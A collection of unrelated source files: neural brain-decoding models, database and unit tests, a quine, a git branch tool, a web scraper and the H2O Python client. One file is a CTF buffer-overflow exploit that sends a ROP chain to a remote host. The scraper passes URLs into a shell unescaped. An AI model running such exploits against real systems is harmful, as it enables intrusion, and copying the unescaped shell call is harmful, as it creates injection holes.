* np.sum(cov_x2 - (cov_x_zc ** 2))
beta = min(beta_, delta)
shrinkage = beta / delta
elif lamb > 1 or lamb < 0:
# Shrinkage values are weird outside this range.
raise ValueError('Regularization lambda must be between 0 and 1, not %g.'%
lamb)
else:
shrinkage = lamb
logging.info('Shrinkage scaling is %g, %g, %g', shrinkage, lamb,
np.mean(np.trace(cov_x) / n_col))
# Equation 12 of Blankertz. Shink eigenvalues toward the mean.
cov_x = (1 - shrinkage) * cov_x + shrinkage * mu * np.identity(n_col)
solution = np.linalg.solve(cov_x, cov_xy)
if use_offset:
return solution[0:-1, :], solution[-1:, :], cov_x, cov_xy, shrinkage
else:
return solution, np.zeros((1,)), cov_x, cov_xy, shrinkage
######################### Create DNN Regressor SubModel ########################
class BrainModelDNN(BrainModel):
"""A deep neural network regressor class.
"""
def __init__(self, input_dataset, num_hidden_list=None, **kwargs):
"""Creates model based on DNNs, a shim around basic Keras Model class.
Args:
input_dataset: Data used to figure out the network sizes.
num_hidden_list: A list of the number of hidden units in each layer.
**kwargs: Arguments that are ignore and simply passed to the super class.
"""
if not isinstance(input_dataset, tf.data.Dataset):
raise ValueError('Dataset must be a tf.data.datasert, not a %s' %
type(input_dataset))
if num_hidden_list is None:
num_hidden_list = []
if not isinstance(num_hidden_list, list):
raise TypeError('Num_hidden_list must be an list, not a %s.' %
type(num_hidden_list))
super(BrainModelDNN, self).__init__(**kwargs)
self._input_width = input_dataset.element_spec[0]['input_1'].shape[-1]
self._output_width = input_dataset.element_spec[1].shape[-1]
self._input_1 = tf.keras.Input(shape=self._input_width, name='input_1')
self.num_hidden_list = num_hidden_list
logging.info('Creating a BrainModelDNN with these hidden unit counts: %s',
num_hidden_list)
self._layer_list = []
for hidden_units in num_hidden_list:
self._layer_list.append(tf.keras.layers.Dense(hidden_units,
activation='relu'))
self._final_layer = tf.keras.layers.Dense(self._output_width,
activation=None)
def call(self, input_dataset):
layer_input = input_dataset['input_1']
for a_layer in self._layer_list:
layer_input = a_layer(layer_input)
return self._final_layer(layer_input)
def compile(self, optimizer=tf.keras.optimizers.RMSprop,
loss='mse',
metrics=(pearson_correlation_first, 'mse'),
learning_rate=1e-3, **kwargs):
"""Compile this model, applying the usual defaults for this classifier.
Args:
optimizer: Which Keras optimizer to use when training.
loss: How do we normally define the performance (loss) of the network.
metrics: Which metric(s) do we report after training.
learning_rate: A learning rate to pass to the optimizer
**kwargs: Arguments that are simply passed to the super class' compile().
"""
if callable(optimizer):
optimizer = optimizer(learning_rate=learning_rate)
super(BrainModelDNN, self).compile(
optimizer=optimizer, loss=loss, metrics=metrics, **kwargs)
def fit(self, input_dataset, **kwargs):
return super(BrainModelDNN, self).fit(input_dataset, None, **kwargs)
####################### Create DNN Classifier SubModel ########################
class BrainModelClassifier(BrainModel):
"""A deep neural network classifier class.
Skip the model-building stage, and directly classify whether the audio and the
EEG are coincident.
"""
def __init__(self, input_dataset, num_hidden_list=None, **kwargs):
"""Creates model based classfifier, a shim around basic Keras Model class.
This takes two inputs, concatenates them, and optimizes a model that
predicts the output. This is generally used as a classifier, and more
specifically a match-mistmatch classifier.
Args:
input_dataset: tf.data.datset used to figure out the network sizes.
num_hidden_list: A list of the number of hidden units in each layer.
**kwargs: Arguments that are simply passed to the super class.
"""
if not isinstance(input_dataset, tf.data.Dataset):
raise TypeError('Dataset must be a tf.data.datasert, not a %s' %
type(input_dataset))
if num_hidden_list is None:
num_hidden_list = []
if not isinstance(num_hidden_list, list):
raise TypeError('Num_hidden_list must be an list, not a %s.' %
type(num_hidden_list))
super(BrainModelClassifier, self).__init__(**kwargs)
self._output_width = input_dataset.element_spec[1].shape[-1]
self.num_hidden_list = num_hidden_list
logging.info('Creating a BrainModelDNN with these hidden unit counts: %s',
num_hidden_list)
self._layer_list = [tf.keras.layers.Dense(hidden_units, activation='relu')
for hidden_units in num_hidden_list]
self._final_layer = tf.keras.layers.Dense(self._output_width,
activation='sigmoid')
def compile(self, optimizer=tf.keras.optimizers.Adam,
loss=tf.keras.losses.BinaryCrossentropy(),
metrics='accuracy', learning_rate=1e-3, **kwargs):
"""Compile this model, applying the usual defaults for this classifier.
Args:
optimizer: Which Keras optimizer to use when training.
loss: How do we normally define the performance (loss) of the network.
metrics: Which metric(s) do we report after training.
learning_rate: learning rate passed to the optimizer.
**kwargs: Arguments that are simply passed to the super class' compile().
"""
if callable(optimizer):
optimizer = optimizer(learning_rate=learning_rate)
super(BrainModelClassifier, self).compile(
optimizer=optimizer, loss=loss, metrics=metrics, **kwargs)
def call(self, input_dataset):
layer_input = tf.concat((input_dataset['input_1'],
input_dataset['input_2']),
axis=1)
for a_layer in self._layer_list:
layer_input = a_layer(layer_input)
return self._final_layer(layer_input)
def fit(self, input_dataset, **kwargs):
return super(BrainModelClassifier, self).fit(input_dataset, None, **kwargs)
|
google/telluride_decoding
|
telluride_decoding/brain_model.py
|
Python
|
apache-2.0
| 24,444
|
import pymysql
connection=pymysql.connect(host="127.0.0.1", port=3306, user="Renion", passwd="password", db="recvdata")
cursor = connection.cursor()
cursor.execute("SELECT original FROM datatable") #ALTER TABLE datatabke ADD item INT DEFAULT self.j[item]
sql_data = cursor.fetchall ()
cursor.close ()
connection.close ()
print (sql_data[0][0])
'''
db.query("SELECT original FROM datatable")
r = db.store_result()
print(r.fetch_row())
'''
|
enorenio/test
|
dsm/alt/mysqltest.py
|
Python
|
mit
| 450
|
#!/usr/bin/python
import hashlib
def escape(s):
d = {"\n":"\\n","\"":"\\\"","\\":"\\\\"}
return "".join(d[k] if k in d else k for k in s)
data = "#!/usr/bin/python\n\nimport hashlib\n\ndef escape(s):\n d = {\"\\n\":\"\\\\n\",\"\\\"\":\"\\\\\\\"\",\"\\\\\":\"\\\\\\\\\"}\n return \"\".join(d[k] if k in d else k for k in s)\n\ndata = \"$\"\n\ncontent = data.replace(chr(36),escape(data))\nprint(hashlib.md5(content).hexdigest())\n"
content = data.replace(chr(36),escape(data))
print(hashlib.md5(content).hexdigest())
|
sclereid/collections
|
quine/selfmd5.py
|
Python
|
mit
| 534
|
#!/usr/bin/env python
# standalone test harness for policy python code
from optparse import OptionParser
_message = {}
class Message:
def __init__(self):
pass
def getInboundProperty(self,key):
return _message[key] if key in _message else ''
def setInboundProperty(self,key,value):
_message[key] = value
parser = OptionParser()
parser.add_option('-g','--group',
type='string',
default='read openid create demo-netphone-admin update auth-columbia delete',
help='group list from idp adapter [default: %default]')
parser.add_option('-s','--scope',
type='string',
default='auth-columbia read openid',
help='scope list from access token [default: %default]')
parser.add_option('-r','--request',
type='string',
default='/v1/api/things',
help='HTTP request path: [default: %default]')
parser.add_option('-l','--listener',
type='string',
default='/v1/api/*',
help='HTTP listener path. [default: %default]')
parser.add_option('-m','--method',
type='string',
default='GET',
help='HTTP method [default: %default]')
parser.parse_args()
message = Message()
message.setInboundProperty('http.listener.path',parser.values.listener)
message.setInboundProperty('http.method',parser.values.method.upper())
message.setInboundProperty('http.request.path',parser.values.request)
payload = ''
# flowVars is a map but the value of _agwTokenContext is a string (that contains JSON)
flowVars={'_agwTokenContext':'{"access_token":{"uid":"ac45@columbia.edu","username":"ac45@columbia.edu","group": "%s"},"scope": "%s","token_type":"urn:pingidentity.com:oauth2:validated_token","expires_in":7195,"client_id":"64575d23b8504c9bb1e9e7ff558c3cd3"}'%(parser.values.group,parser.values.scope)}
import logging
log = logging.getLogger()
if not log.handlers:
handler = logging.StreamHandler()
formatter = logging.Formatter('%(levelname)-5s %(asctime)s %(message)s')
handler.setFormatter(formatter)
log.addHandler(handler)
log.setLevel(logging.DEBUG)
###
# paste below the generated python code from for example ~/AnypointStudio/workspace/.mule/policies/24940-235285.xml
# SNIP - SNIP - SNIP
###
|
n2ygk/mulesoft-oauth2-scope-enforcer
|
test.py
|
Python
|
apache-2.0
| 2,376
|
from projectname.tests import *
class TestSampleController(TestController):
def test_set_lang(self):
response = self.app.get(url_for(controller='/sample', action='set_lang', lang='ja'))
assert u'\u8a00\u8a9e\u8a2d\u5b9a\u3092\u300cja\u300d\u306b\u5909\u66f4\u3057\u307e\u3057\u305f'.encode('utf-8') in response
response = self.app.get(url_for(controller='/sample', action='set_lang', lang='fr'))
assert 'Could not set language to "fr"' in response
def test_detect_lang(self):
response = self.app.get(url_for(controller='/sample', action='i18n_index'), headers={
'Accept-Language':'fr;q=0.6, en;q=0.1, ja;q=0.3'})
# expect japanese fallback for nonexistent french.
assert u'\u6839\u672c\u30a4\u30f3\u30c7\u30af\u30b9\u30da\u30fc\u30b8'.encode('utf-8') in response
def test_no_lang(self):
response = self.app.get(url_for(controller='/sample', action='no_lang'))
assert 'No language' in response
assert 'No languages' in response
|
santisiri/popego
|
envs/ALPHA-POPEGO/lib/python2.5/site-packages/Pylons-0.9.6.1-py2.5.egg/tests/test_webapps/filestotest/functional_sample_controller_i18n.py
|
Python
|
bsd-3-clause
| 1,038
|
# uncompyle6 version 2.9.10
# Python bytecode 2.7 (62211)
# Decompiled from: Python 3.6.0b2 (default, Oct 11 2016, 05:27:10)
# [GCC 6.2.0 20161005]
# Embedded file name: file_util.py
"""distutils.file_util
Utility functions for operating on single files.
"""
__revision__ = '$Id$'
import os
from distutils.errors import DistutilsFileError
from distutils import log
_copy_action = {None: 'copying','hard': 'hard linking',
'sym': 'symbolically linking'
}
def _copy_file_contents(src, dst, buffer_size=16384):
"""Copy the file 'src' to 'dst'.
Both must be filenames. Any error opening either file, reading from
'src', or writing to 'dst', raises DistutilsFileError. Data is
read/written in chunks of 'buffer_size' bytes (default 16k). No attempt
is made to handle anything apart from regular files.
"""
fsrc = None
fdst = None
try:
try:
fsrc = open(src, 'rb')
except os.error as (errno, errstr):
raise DistutilsFileError("could not open '%s': %s" % (src, errstr))
if os.path.exists(dst):
try:
os.unlink(dst)
except os.error as (errno, errstr):
raise DistutilsFileError("could not delete '%s': %s" % (dst, errstr))
try:
fdst = open(dst, 'wb')
except os.error as (errno, errstr):
raise DistutilsFileError("could not create '%s': %s" % (dst, errstr))
while 1:
try:
buf = fsrc.read(buffer_size)
except os.error as (errno, errstr):
raise DistutilsFileError("could not read from '%s': %s" % (src, errstr))
if not buf:
break
try:
fdst.write(buf)
except os.error as (errno, errstr):
raise DistutilsFileError("could not write to '%s': %s" % (dst, errstr))
finally:
if fdst:
fdst.close()
if fsrc:
fsrc.close()
return
def copy_file(src, dst, preserve_mode=1, preserve_times=1, update=0, link=None, verbose=1, dry_run=0):
"""Copy a file 'src' to 'dst'.
If 'dst' is a directory, then 'src' is copied there with the same name;
otherwise, it must be a filename. (If the file exists, it will be
ruthlessly clobbered.) If 'preserve_mode' is true (the default),
the file's mode (type and permission bits, or whatever is analogous on
the current platform) is copied. If 'preserve_times' is true (the
default), the last-modified and last-access times are copied as well.
If 'update' is true, 'src' will only be copied if 'dst' does not exist,
or if 'dst' does exist but is older than 'src'.
'link' allows you to make hard links (os.link) or symbolic links
(os.symlink) instead of copying: set it to "hard" or "sym"; if it is
None (the default), files are copied. Don't set 'link' on systems that
don't support it: 'copy_file()' doesn't check if hard or symbolic
linking is available.
Under Mac OS, uses the native file copy function in macostools; on
other systems, uses '_copy_file_contents()' to copy file contents.
Return a tuple (dest_name, copied): 'dest_name' is the actual name of
the output file, and 'copied' is true if the file was copied (or would
have been copied, if 'dry_run' true).
"""
from distutils.dep_util import newer
from stat import ST_ATIME, ST_MTIME, ST_MODE, S_IMODE
if not os.path.isfile(src):
raise DistutilsFileError("can't copy '%s': doesn't exist or not a regular file" % src)
if os.path.isdir(dst):
dir = dst
dst = os.path.join(dst, os.path.basename(src))
else:
dir = os.path.dirname(dst)
if update and not newer(src, dst):
if verbose >= 1:
log.debug('not copying %s (output up-to-date)', src)
return (dst, 0)
try:
action = _copy_action[link]
except KeyError:
raise ValueError("invalid value '%s' for 'link' argument" % link)
if verbose >= 1:
if os.path.basename(dst) == os.path.basename(src):
log.info('%s %s -> %s', action, src, dir)
else:
log.info('%s %s -> %s', action, src, dst)
if dry_run:
return (dst, 1)
if link == 'hard':
if not (os.path.exists(dst) and os.path.samefile(src, dst)):
os.link(src, dst)
elif link == 'sym':
if not (os.path.exists(dst) and os.path.samefile(src, dst)):
os.symlink(src, dst)
else:
_copy_file_contents(src, dst)
if preserve_mode or preserve_times:
st = os.stat(src)
if preserve_times:
os.utime(dst, (st[ST_ATIME], st[ST_MTIME]))
if preserve_mode:
os.chmod(dst, S_IMODE(st[ST_MODE]))
return (
dst, 1)
def move_file(src, dst, verbose=1, dry_run=0):
"""Move a file 'src' to 'dst'.
If 'dst' is a directory, the file will be moved into it with the same
name; otherwise, 'src' is just renamed to 'dst'. Return the new
full name of the file.
Handles cross-device moves on Unix using 'copy_file()'. What about
other systems???
"""
from os.path import exists, isfile, isdir, basename, dirname
import errno
if verbose >= 1:
log.info('moving %s -> %s', src, dst)
if dry_run:
return dst
if not isfile(src):
raise DistutilsFileError("can't move '%s': not a regular file" % src)
if isdir(dst):
dst = os.path.join(dst, basename(src))
elif exists(dst):
raise DistutilsFileError("can't move '%s': destination '%s' already exists" % (
src, dst))
if not isdir(dirname(dst)):
raise DistutilsFileError("can't move '%s': destination '%s' not a valid path" % (
src, dst))
copy_it = 0
try:
os.rename(src, dst)
except os.error as (num, msg):
if num == errno.EXDEV:
copy_it = 1
else:
raise DistutilsFileError("couldn't move '%s' to '%s': %s" % (src, dst, msg))
if copy_it:
copy_file(src, dst, verbose=verbose)
try:
os.unlink(src)
except os.error as (num, msg):
try:
os.unlink(dst)
except os.error:
pass
raise DistutilsFileError(("couldn't move '%s' to '%s' by copy/delete: " + "delete '%s' failed: %s") % (
src, dst, src, msg))
return dst
def write_file(filename, contents):
"""Create a file with the specified name and write 'contents' (a
sequence of strings without line terminators) to it.
"""
f = open(filename, 'w')
try:
for line in contents:
f.write(line + '\n')
finally:
f.close()
|
DarthMaulware/EquationGroupLeaks
|
Leak #5 - Lost In Translation/windows/Resources/Python/Core/Lib/distutils/file_util.py
|
Python
|
unlicense
| 6,802
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwnpwnpwn import *
from pwn import *
#host = "10.211.55.6"
#port = 8888
host = "128.199.152.175"
port = 10001
r = remote(host,port)
context.arch = "amd64"
# brute force 4 bit
payload = "a"*24
pop_rdi = 0x00000000004005c3
pop_rsi_r15 = 0x00000000004005c1
read = 0x400400
read_got = 0x0000000000601018
payload += flat([pop_rdi,0,pop_rsi_r15,read_got,0,read,read]) + "\x00"*0x78
r.sendline(payload)
r.send('\x67\x55')
r.interactive()
|
scwuaptx/CTF
|
2017-writeup/asis/start_hard.py
|
Python
|
gpl-2.0
| 485
|
#!/usr/bin/env python
import itertools as it
import ubelt as ub
def check_relationships(branches):
ancestors = {b: set() for b in branches}
length = len(branches) * (len(branches) - 1)
for b1, b2 in ub.ProgIter(it.combinations(branches, 2), length=length):
ret = ub.cmd('git merge-base --is-ancestor {} {}'.format(b1, b2))['ret']
if ret == 0:
ancestors[b1].add(b2)
ret = ub.cmd('git merge-base --is-ancestor {} {}'.format(b2, b1))['ret']
if ret == 0:
ancestors[b2].add(b1)
print('<key> is an ancestor of <value>')
print(ub.repr2(ancestors))
descendants = {b: set() for b in branches}
for key, others in ancestors.items():
for o in others:
descendants[o].add(key)
print('<key> descends from <value>')
print(ub.repr2(descendants))
import plottool as pt
import networkx as nx
G = nx.DiGraph()
G.add_nodes_from(branches)
for key, others in ancestors.items():
for o in others:
# G.add_edge(key, o)
G.add_edge(o, key)
from networkx.algorithms.connectivity.edge_augmentation import collapse
flag = True
G2 = G
while flag:
flag = False
for u, v in list(G2.edges()):
if G2.has_edge(v, u):
G2 = collapse(G2, [[u, v]])
node_relabel = ub.ddict(list)
for old, new in G2.graph['mapping'].items():
node_relabel[new].append(old)
G2 = nx.relabel_nodes(G2, {k: '\n'.join(v) for k, v in node_relabel.items()})
flag = True
break
G3 = nx.transitive_reduction(G2)
pt.show_nx(G3, arrow_width=1.5, prog='dot', layoutkw=dict(prog='dot'))
pt.zoom_factory()
pt.pan_factory()
pt.plt.show()
if __name__ == '__main__':
r"""
CommandLine:
export PYTHONPATH=$PYTHONPATH:/home/joncrall/misc
python ~/misc/git-branch-relationships.py
python ~/misc/git-branch-relationships.py "
jon/viame/master jon/viame/next master dev/tracking-framework
viame/master viame/query-wip viame/tracking-work
viame/master-no-pybind viame/master-w-pytorch
"
"""
# branches = [x.strip() for x in '''
# jon/viame/master
# jon/viame/next
# master
# dev/tracking-framework
# viame/master
# viame/query-wip
# viame/tracking-work
# viame/master-no-pybind
# viame/master-w-pytorch
# '''.splitlines() if x.strip()]
import sys
argv = sys.argv[1:]
branches = []
for item in argv:
for sub in item.split():
sub = sub.strip()
if sub:
branches.append(sub)
print('branches = {}'.format(ub.repr2(branches)))
check_relationships(branches)
|
Erotemic/local
|
git_tools/git_branch_relationships.py
|
Python
|
gpl-3.0
| 2,945
|
from selenium import webdriver
from selenium.webdriver.support.ui import Select
url_list = []
for index in range(0, 253):
profile = webdriver.FirefoxProfile()
profile.set_preference("permissions.default.image", 2)
profile.set_preference("permissions.default.script", 2)
profile.set_preference("permissions.default.stylesheet", 2)
profile.set_preference("permissions.default.subdocument", 2)
# profile.native_events_enabled = True
driver = webdriver.Firefox(profile)
driver.implicitly_wait(30)
base_url = "http://www.gadm.org/"
driver.get(base_url + "country")
Select(driver.find_element_by_name("cnt")).select_by_index(index)
driver.find_element_by_name("OK").click()
url = driver.find_element_by_css_selector("div.content a").get_attribute("href")
driver.quit()
url_list.append(url)
import subprocess
for url in url_list:
subprocess.Popen("wget " + url, shell=True)
|
howl-anderson/SDMdata
|
install/get_gadm_data/main.py
|
Python
|
agpl-3.0
| 935
|
# -*- encoding: utf-8 -*-
"""
h2o -- module for using H2O services.
:copyright: (c) 2016 H2O.ai
:license: Apache License Version 2.0 (see LICENSE for details)
"""
from __future__ import absolute_import, division, print_function, unicode_literals
import logging
import os
import warnings
import webbrowser
from h2o.backend import H2OConnection
from h2o.backend import H2OConnectionConf
from h2o.backend import H2OLocalServer
from h2o.exceptions import H2OConnectionError, H2OValueError
from h2o.utils.config import H2OConfigReader
from h2o.utils.shared_utils import check_frame_id, deprecated, gen_header, py_tmp_key, quoted, urlopen
from h2o.utils.typechecks import assert_is_type, assert_satisfies, BoundInt, BoundNumeric, I, is_type, numeric, U
from .estimators.deeplearning import H2OAutoEncoderEstimator
from .estimators.deeplearning import H2ODeepLearningEstimator
from .estimators.deepwater import H2ODeepWaterEstimator
from .estimators.estimator_base import H2OEstimator
from .estimators.xgboost import H2OXGBoostEstimator
from .estimators.gbm import H2OGradientBoostingEstimator
from .estimators.glm import H2OGeneralizedLinearEstimator
from .estimators.glrm import H2OGeneralizedLowRankEstimator
from .estimators.kmeans import H2OKMeansEstimator
from .estimators.naive_bayes import H2ONaiveBayesEstimator
from .estimators.random_forest import H2ORandomForestEstimator
from .estimators.stackedensemble import H2OStackedEnsembleEstimator
from .estimators.word2vec import H2OWord2vecEstimator
from .expr import ExprNode
from .frame import H2OFrame
from .grid.grid_search import H2OGridSearch
from .job import H2OJob
from .model.model_base import ModelBase
from .transforms.decomposition import H2OPCA
from .transforms.decomposition import H2OSVD
from .utils.debugging import * # NOQA
from .utils.compatibility import * # NOQA
from .utils.compatibility import PY3
logging.basicConfig()
# An IPython deprecation warning is triggered after h2o.init(). Remove this once the deprecation has been resolved
warnings.filterwarnings('ignore', category=DeprecationWarning, module='.*/IPython/.*')
h2oconn = None # type: H2OConnection
def connect(server=None, url=None, ip=None, port=None, https=None, verify_ssl_certificates=None, auth=None,
proxy=None,cookies=None, verbose=True, config=None):
"""
Connect to an existing H2O server, remote or local.
There are two ways to connect to a server: either pass a `server` parameter containing an instance of
an H2OLocalServer, or specify `ip` and `port` of the server that you want to connect to.
:param server: An H2OLocalServer instance to connect to (optional).
:param url: Full URL of the server to connect to (can be used instead of `ip` + `port` + `https`).
:param ip: The ip address (or host name) of the server where H2O is running.
:param port: Port number that H2O service is listening to.
:param https: Set to True to connect via https:// instead of http://.
:param verify_ssl_certificates: When using https, setting this to False will disable SSL certificates verification.
:param auth: Either a (username, password) pair for basic authentication, or one of the requests.auth
authenticator objects.
:param proxy: Proxy server address.
:param cookies: Cookie (or list of) to add to request
:param verbose: Set to False to disable printing connection status messages.
:param connection_conf: Connection configuration object encapsulating connection parameters.
:returns: the new :class:`H2OConnection` object.
"""
global h2oconn
if config:
if "connect_params" in config:
h2oconn = _connect_with_conf(config["connect_params"])
else:
h2oconn = _connect_with_conf(config)
else:
h2oconn = H2OConnection.open(server=server, url=url, ip=ip, port=port, https=https,
auth=auth, verify_ssl_certificates=verify_ssl_certificates,
proxy=proxy,cookies=cookies,
verbose=verbose)
h2oconn.cluster.timezone = "UTC"
if verbose:
h2oconn.cluster.show_status()
return h2oconn
def api(endpoint, data=None, json=None, filename=None, save_to=None):
"""
Perform a REST API request to a previously connected server.
This function is mostly for internal purposes, but may occasionally be useful for direct access to
the backend H2O server. It has same parameters as :meth:`H2OConnection.request <h2o.backend.H2OConnection.request>`.
"""
# type checks are performed in H2OConnection class
_check_connection()
return h2oconn.request(endpoint, data=data, json=json, filename=filename, save_to=save_to)
def connection():
"""Return the current :class:`H2OConnection` handler."""
return h2oconn
def version_check():
"""Used to verify that h2o-python module and the H2O server are compatible with each other."""
from .__init__ import __version__ as ver_pkg
ci = h2oconn.cluster
if not ci:
raise H2OConnectionError("Connection not initialized. Did you run h2o.connect()?")
ver_h2o = ci.version
if ver_pkg == "SUBST_PROJECT_VERSION": ver_pkg = "UNKNOWN"
if str(ver_h2o) != str(ver_pkg):
branch_name_h2o = ci.branch_name
build_number_h2o = ci.build_number
if build_number_h2o is None or build_number_h2o == "unknown":
raise H2OConnectionError(
"Version mismatch. H2O is version {0}, but the h2o-python package is version {1}. "
"Upgrade H2O and h2o-Python to latest stable version - "
"http://h2o-release.s3.amazonaws.com/h2o/latest_stable.html"
"".format(ver_h2o, ver_pkg))
elif build_number_h2o == "99999":
raise H2OConnectionError(
"Version mismatch. H2O is version {0}, but the h2o-python package is version {1}. "
"This is a developer build, please contact your developer."
"".format(ver_h2o, ver_pkg))
else:
raise H2OConnectionError(
"Version mismatch. H2O is version {0}, but the h2o-python package is version {1}. "
"Install the matching h2o-Python version from - "
"http://h2o-release.s3.amazonaws.com/h2o/{2}/{3}/index.html."
"".format(ver_h2o, ver_pkg, branch_name_h2o, build_number_h2o))
# Check age of the install
if ci.build_too_old:
print("Warning: Your H2O cluster version is too old ({})! Please download and install the latest "
"version from http://h2o.ai/download/".format(ci.build_age))
def init(url=None, ip=None, port=None, https=None, insecure=None, username=None, password=None,
cookies=None, proxy=None, start_h2o=True, nthreads=-1, ice_root=None, enable_assertions=True,
max_mem_size=None, min_mem_size=None, strict_version_check=None, ignore_config=False,
extra_classpath=None, **kwargs):
"""
Attempt to connect to a local server, or if not successful start a new server and connect to it.
:param url: Full URL of the server to connect to (can be used instead of `ip` + `port` + `https`).
:param ip: The ip address (or host name) of the server where H2O is running.
:param port: Port number that H2O service is listening to.
:param https: Set to True to connect via https:// instead of http://.
:param insecure: When using https, setting this to True will disable SSL certificates verification.
:param username: Username and
:param password: Password for basic authentication.
:param cookies: Cookie (or list of) to add to each request.
:param proxy: Proxy server address.
:param start_h2o: If False, do not attempt to start an h2o server when connection to an existing one failed.
:param nthreads: "Number of threads" option when launching a new h2o server.
:param ice_root: Directory for temporary files for the new h2o server.
:param enable_assertions: Enable assertions in Java for the new h2o server.
:param max_mem_size: Maximum memory to use for the new h2o server.
:param min_mem_size: Minimum memory to use for the new h2o server.
:param strict_version_check: If True, an error will be raised if the client and server versions don't match.
:param ignore_config: Indicates whether a processing of a .h2oconfig file should be conducted or not. Default value is False.
:param extra_classpath: List of paths to libraries that should be included on the Java classpath when starting H2O from Python.
:param kwargs: (all other deprecated attributes)
"""
global h2oconn
assert_is_type(url, str, None)
assert_is_type(ip, str, None)
assert_is_type(port, int, str, None)
assert_is_type(https, bool, None)
assert_is_type(insecure, bool, None)
assert_is_type(username, str, None)
assert_is_type(password, str, None)
assert_is_type(cookies, str, [str], None)
assert_is_type(proxy, {str: str}, None)
assert_is_type(start_h2o, bool, None)
assert_is_type(nthreads, int)
assert_is_type(ice_root, str, None)
assert_is_type(enable_assertions, bool)
assert_is_type(max_mem_size, int, str, None)
assert_is_type(min_mem_size, int, str, None)
assert_is_type(strict_version_check, bool, None)
assert_is_type(extra_classpath, [str], None)
assert_is_type(kwargs, {"proxies": {str: str}, "max_mem_size_GB": int, "min_mem_size_GB": int,
"force_connect": bool})
def get_mem_size(mmint, mmgb):
if not mmint: # treat 0 and "" as if they were None
if mmgb is None: return None
return mmgb << 30
if is_type(mmint, int):
# If the user gives some small number just assume it's in Gigabytes...
if mmint < 1000: return mmint << 30
return mmint
if is_type(mmint, str):
last = mmint[-1].upper()
num = mmint[:-1]
if not (num.isdigit() and last in "MGT"):
raise H2OValueError("Wrong format for a *_memory_size argument: %s (should be a number followed by "
"a suffix 'M', 'G' or 'T')" % mmint)
if last == "T": return int(num) << 40
if last == "G": return int(num) << 30
if last == "M": return int(num) << 20
scheme = "https" if https else "http"
proxy = proxy[scheme] if proxy is not None and scheme in proxy else \
kwargs["proxies"][scheme] if "proxies" in kwargs and scheme in kwargs["proxies"] else None
mmax = get_mem_size(max_mem_size, kwargs.get("max_mem_size_GB"))
mmin = get_mem_size(min_mem_size, kwargs.get("min_mem_size_GB"))
auth = (username, password) if username and password else None
check_version = True
verify_ssl_certificates = True
# Apply the config file if ignore_config=False
if not ignore_config:
config = H2OConfigReader.get_config()
if url is None and ip is None and port is None and https is None and "init.url" in config:
url = config["init.url"]
if proxy is None and "init.proxy" in config:
proxy = config["init.proxy"]
if cookies is None and "init.cookies" in config:
cookies = config["init.cookies"].split(";")
if auth is None and "init.username" in config and "init.password" in config:
auth = (config["init.username"], config["init.password"])
if strict_version_check is None:
if "init.check_version" in config:
check_version = config["init.check_version"].lower() != "false"
elif os.environ.get("H2O_DISABLE_STRICT_VERSION_CHECK"):
check_version = False
else:
check_version = strict_version_check
if insecure is None:
if "init.verify_ssl_certificates" in config:
verify_ssl_certificates = config["init.verify_ssl_certificates"].lower() != "false"
else:
verify_ssl_certificates = not insecure
if not start_h2o:
print("Warning: if you don't want to start local H2O server, then use of `h2o.connect()` is preferred.")
try:
h2oconn = H2OConnection.open(url=url, ip=ip, port=port, https=https,
verify_ssl_certificates=verify_ssl_certificates,
auth=auth, proxy=proxy,cookies=cookies, verbose=True,
_msgs=("Checking whether there is an H2O instance running at {url}",
"connected.", "not found."))
except H2OConnectionError:
# Backward compatibility: in init() port parameter really meant "baseport" when starting a local server...
if port and not str(port).endswith("+"):
port = str(port) + "+"
if not start_h2o: raise
if ip and not (ip == "localhost" or ip == "127.0.0.1"):
raise H2OConnectionError('Can only start H2O launcher if IP address is localhost.')
hs = H2OLocalServer.start(nthreads=nthreads, enable_assertions=enable_assertions, max_mem_size=mmax,
min_mem_size=mmin, ice_root=ice_root, port=port, extra_classpath=extra_classpath)
h2oconn = H2OConnection.open(server=hs, https=https, verify_ssl_certificates=not insecure,
auth=auth, proxy=proxy,cookies=cookies, verbose=True)
if check_version:
version_check()
h2oconn.cluster.timezone = "UTC"
h2oconn.cluster.show_status()
def lazy_import(path, pattern=None):
"""
Import a single file or collection of files.
:param path: A path to a data file (remote or local).
:param pattern: Character string containing a regular expression to match file(s) in the folder.
:returns: either a :class:`H2OFrame` with the content of the provided file, or a list of such frames if
importing multiple files.
"""
assert_is_type(path, str, [str])
assert_is_type(pattern, str, None)
if is_type(path, str):
return _import(path, pattern)
else:
return [_import(p, pattern)[0] for p in path]
def _import(path, pattern):
assert_is_type(path, str)
assert_is_type(pattern, str, None)
j = api("GET /3/ImportFiles", data={"path": path, "pattern": pattern})
if j["fails"]: raise ValueError("ImportFiles of " + path + " failed on " + str(j["fails"]))
return j["destination_frames"]
def upload_file(path, destination_frame=None, header=0, sep=None, col_names=None, col_types=None,
na_strings=None):
"""
Upload a dataset from the provided local path to the H2O cluster.
Does a single-threaded push to H2O. Also see :meth:`import_file`.
:param path: A path specifying the location of the data to upload.
:param destination_frame: The unique hex key assigned to the imported file. If none is given, a key will
be automatically generated.
:param header: -1 means the first line is data, 0 means guess, 1 means first line is header.
:param sep: The field separator character. Values on each line of the file are separated by
this character. If not provided, the parser will automatically detect the separator.
:param col_names: A list of column names for the file.
:param col_types: A list of types or a dictionary of column names to types to specify whether columns
should be forced to a certain type upon import parsing. If a list, the types for elements that are
one will be guessed. The possible types a column may have are:
- "unknown" - this will force the column to be parsed as all NA
- "uuid" - the values in the column must be true UUID or will be parsed as NA
- "string" - force the column to be parsed as a string
- "numeric" - force the column to be parsed as numeric. H2O will handle the compression of the numeric
data in the optimal manner.
- "enum" - force the column to be parsed as a categorical column.
- "time" - force the column to be parsed as a time column. H2O will attempt to parse the following
list of date time formats: (date) "yyyy-MM-dd", "yyyy MM dd", "dd-MMM-yy", "dd MMM yy", (time)
"HH:mm:ss", "HH:mm:ss:SSS", "HH:mm:ss:SSSnnnnnn", "HH.mm.ss" "HH.mm.ss.SSS", "HH.mm.ss.SSSnnnnnn".
Times can also contain "AM" or "PM".
:param na_strings: A list of strings, or a list of lists of strings (one list per column), or a dictionary
of column names to strings which are to be interpreted as missing values.
:returns: a new :class:`H2OFrame` instance.
:examples:
>>> frame = h2o.upload_file("/path/to/local/data")
"""
coltype = U(None, "unknown", "uuid", "string", "float", "real", "double", "int", "numeric",
"categorical", "factor", "enum", "time")
natype = U(str, [str])
assert_is_type(path, str)
assert_is_type(destination_frame, str, None)
assert_is_type(header, -1, 0, 1)
assert_is_type(sep, None, I(str, lambda s: len(s) == 1))
